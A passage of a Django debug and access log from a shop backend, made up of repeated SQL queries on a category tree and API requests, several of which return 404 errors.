ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:31:11,907 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:31:11] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 09:31:45] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [13/Dec/2019 09:33:55] "GET /proxy.php HTTP/1.0" 404 6625 [13/Dec/2019 09:36:57] "GET / HTTP/1.0" 302 0 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:39:30] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:39:30] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 DEBUG 2019-12-13 09:40:27,515 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:40:27,522 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:40:27,526 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:40:27,530 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:40:27,532 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:40:27,534 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:40:27,537 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:40:27,539 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:40:27,541 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:40:27,543 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:40:27,545 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:40:27] "GET /api/v1/categories/ HTTP/1.0" 200 1769 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:40:57] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 [13/Dec/2019 09:42:00] "GET / HTTP/1.0" 302 0 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:42:17] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:42:25] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:42:29] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:43:03] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:48:31] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 Not Found: /api/v1/orgprojects/undefined [13/Dec/2019 09:48:43] "GET /api/v1/orgprojects/undefined HTTP/1.0" 404 7497 DEBUG 2019-12-13 09:50:13,794 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 09:50:13,799 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 09:50:13] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 09:50:13,875 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:50:13,880 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:50:13,883 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:50:13,885 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:50:13,887 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:50:13,889 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:50:13,892 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:50:13,894 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:50:13,896 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:50:13,898 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:50:13,901 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:50:13] "GET /api/v1/categories/cfdg HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:51:12,853 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:51:12,858 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:51:12,860 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:51:12,863 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:51:12,865 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:51:12,867 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:51:12,869 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:51:12,875 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:51:12,877 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:51:12,879 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:51:12,881 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 09:51:12,885 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 09:51:12,886 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 09:51:12] "GET /api/v1/categories/cfdg HTTP/1.0" 200 1769 [13/Dec/2019 09:51:12] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 09:51:22,127 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 09:51:22,134 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 09:51:22] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 09:51:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 09:52:19,000 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 09:52:19,005 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 09:52:19] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 09:56:51] "GET / HTTP/1.0" 302 0 [13/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:07:12,242 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:07:12,247 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:07:12] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:07:20,207 utils 11259 139831538779904 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:07:20,213 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:07:20] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:07:40,426 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:07:40,431 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:07:40] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:14:45] "GET / HTTP/1.0" 302 0 [13/Dec/2019 10:23:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:29:04,584 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:29:04,589 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:29:04] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:30:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:35:00,681 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:35:00,686 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:35:00] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:36:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:40:08,887 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:40:08,893 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:40:08] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:40:48,028 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:40:48,033 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:40:48] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:41:28,417 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:41:28,422 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:41:28] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:41:34,514 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:41:34,519 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:41:34] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:42:15] "GET / HTTP/1.0" 302 0 [13/Dec/2019 10:47:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:51:02,788 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:51:02,793 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" 